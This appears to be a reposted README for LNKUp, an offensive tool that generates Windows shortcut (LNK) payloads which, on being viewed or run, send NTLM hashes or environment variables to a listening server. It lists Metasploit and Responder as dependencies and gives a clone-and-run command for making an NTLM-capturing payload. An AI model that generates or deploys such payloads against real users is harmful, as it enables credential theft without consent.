LEGAL DISCLAMER
The author does not hold any responsibility about the bad use of this script, remember that attacking targets without prior concent its ilegal and punish by law, this script was build to show how resource files can automate tasks.
LNKUp is a tool will allow you to generate LNK payloads. Upon rendering or being run, they will exfiltrate data.
Dependencies:
+ Metasploit Framework
+ Python 2.7.x
LNKUp
Note:
– This tool will not work on OSX or Linux machines. It is specifically designed to target windows.
– There may be issues with icon caching in some situations. If your payload doesn’t execute after the first time, try regenerating it.
– You will need to run a responder or metasploit module server to capture NTLM hashes.
– To capture environment variables, you’ll need to run a webserver like apache, nginx, or even just this
Usage:
git clone https://github.com/Plazmaz/LNKUp && cd LNKUp python generate.py --host localhost --type ntlm --output out.lnk
Source: https://github.com/Plazmaz